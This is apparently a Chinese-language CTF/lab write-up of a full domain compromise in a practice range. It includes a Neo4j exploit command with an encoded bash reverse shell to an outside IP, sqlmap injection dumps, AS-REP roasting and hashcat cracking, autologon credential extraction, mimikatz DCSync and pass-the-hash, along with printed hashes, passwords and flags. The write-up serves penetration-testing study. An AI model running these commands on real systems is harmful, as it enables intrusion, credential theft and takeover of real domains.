先用fscan扫一下,得到了下面的端口
挨个尝试,访问7473发现是个neo4j的服务.
这个neo4j的server只出现过这一个历史漏洞
我们在网上下载jar漏洞利用文件,然后在本地运行.
注意:一定是要java8,同时反弹shell的时候要使用编码防止传输中出现错误
运行命令
java -jar .\rhino_gadget.jar rmi://39.99.227.58:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3R
jcC8xMjMuNTcuMjMuNDAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"
成功拿到shell
查看/home/neo4j/flag01.txt,得到flag:flag{9be1c3b3-b972-4563-81d6-1733dc709152}
上传并配置nps代理,上传fscan扫描内网.
还有个12没扫出来,有点幽默,分别看看是啥
发现172.22.6.38可以进行后台登录.
这里的用户名处存在sql注入漏洞
我们抓取http头部去sqlmap跑一下
proxychains sqlmap -r http -D oa_db -T oa_f1Agggg -C flag02 --dump --batch
得到了第二个flag:flag{b142f5ce-d9b8-4b73-9012-ad75175ba029}
接下来我们把oa_db数据库下的oa_users表dump下来,一会会用到
proxychains sqlmap -r http -D oa_db -T oa_users --dump --batch
然后使用python脚本进行处理,提取出其中的用户名到user.txt中
import re
# 打开原始数据文件
with open('/home/lbz/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_users.csv', 'r') as file:
data = file.readlines()
# 提取指定字符串
users = []
for line in data:
match = re.search(r'(\w+)@xiaorang.lab', line)
if match:
username = match.group(1)
users.append(username)
# 保存提取后的字符串到 user.txt
with open('user.txt', 'w') as file:
for user in users:
file.write(user + '\n')
AS-REPRoasting
当关闭了预身份验证后(该属性默认是没关的),此时向域控制器的88端口发送AS_REQ请求,此时域控不会进行任何验证就将TGT和该用户Hash加密的Login Session Key 返回,我们在本地就可以对获取到的用户Hash加密的Session-Key进行离线破解,从而得到域用户的NTLM哈希
使用命令查找未设身份认证的用户:
proxychains python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile /home/lbz/Documents/user.txt xiaorang.lab/
一共有两个未设身份认证的用户
我们得到了他们的NTLM哈希后的密码Session-Key
[email protected]:e131b8fa9c2585a5742a4017a8671c6a$0f1ff468e4ec6840a86fee2d13140de9d39efa5f574ff08fe3e0fb607c6fdfbdeac93f4af1e04f7e20d907cdba5631abbb5b472ec8675810f2acb511d0d1fd2961219574b37278322ecd482c3a8d766dae4b01aa0ba298735c3ef2ca9e925012d4a774b8e0bf9709d485e50b9ad0111e4cf2b9e1f0ad8ac7cf6e9e5dac08fe1a0099db2e1faacce170e387045ef23974b9b9a71b5331981434af341b08ea768edaf133c2f9cb0496315141b1d4d305ab1de41a7f88dc8b1c4248630b0bcdfaf4f84eec565a6459f144835304ff7077ce832ee75452e1317533f118cff1b3429ed937c78730d7112c642a5254
[email protected]:d60971c8f8c04a191b2a1841711b8515$2b134b2542f2bd8d8111cfee6f3d0d41c905fb0e298d6e9208f6518609c2d6196003a70cf294fa490492d09f41299733de088b4c125a6a0e2ee135c2e5738b5a036bb66344822337c2a9c5c574667aca451a22af7f457b5fab3e5c1202d48aa66b67eb88ae61cbe0e59387a5dd694bec8432b3ff8cb5bf5ed898145b6239808504945b3a760dcf9fd2e25a8c0303a445019679e79c5868b8a4a57b4f165c46138188c9bde537aa2e1ef47ee079f1afbbeb68857f4cf70d8980b99978f8b5495b3941534ae77b9e1841f3552bf6cdc10736949ce557ec010091be7313625be687dc124a1b21c88102a9615afa
使用hashcat去爆破一下
hashcat -m 18200 --force -a 0 '哈希' /usr/share/wordlists/rockyou.txt
得到了账号和密码分别为
[email protected]/strawberry
[email protected]/hellokitty
使用windows下mstsc登录172.22.6.25
查看信息时发现还有一个主机进行了本地登录
怀疑这个yuxuan是windows自动登录,通过注册表进行查看
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
发现果然存在着自动登录
账号:[email protected],密码:Yuxuan7QbrgZ3L
我们切换到yuxuan账户.
把Sharphound复制粘贴进去,进行域信息搜集.
bloodhound是最知名的域内信息搜集工具之一,它可以使用可视化图形显示域环境中的关系,让攻击者识别高度复杂的攻击路径。
运行命令
SharpHound.exe -c all
然后将得到的zip上传到Bloodhound中进行分析(然而在上传这一步卡死了...到晚上都没成功...,下面是网图)
我们可以看到我们从win2019到了yuxuan,通过HasSssion,也就是保存的登录凭证.
当前的yuxuan用户HasSidHistory,滥用了SID历史功能
什么是SID历史功能?
在域迁移或合并过程中,用户账户可能会从一个域迁移到另一个域。为了确保用户在新域中仍然能够访问旧域中的资源,Active Directory 提供了 SID 历史属性。SID 历史属性允许将旧域的 SID 添加到新域的用户账户中,从而保留对旧域资源的访问权限。
如果将管理员的 SID 添加到普通用户的历史中,将允许低权限账户运行高权限操作。
上传mimikatz进行域用户抓取
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
拿到了大量用户的哈希
其中Administractor的哈希为04d93ffd6f5f6e4490e0de23f240a5e9
接下来打一手哈希横传.
分别在win2019(172.22.6.25)和DC(172.22.6.12)上得到了flag3和flag4
proxychains crackmapexec smb 172.22.6.12 -u Administrator -H 04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"
flag3:flag{5549f5c0-fcb1-4491-b0a4-0084f103c83e}
flag4:flag{815a3b3f-8b99-4ce5-9253-ac0b31e36cb7}
共用时2小时24分钟,目前最顺利的一个靶场.学习了AS-REP Roasting攻击.感觉理论知识很欠缺,尤其Kerberous验证这里.之前在tsclient靶场mstsc.exe失效了,然而这里却好使了,很神奇...
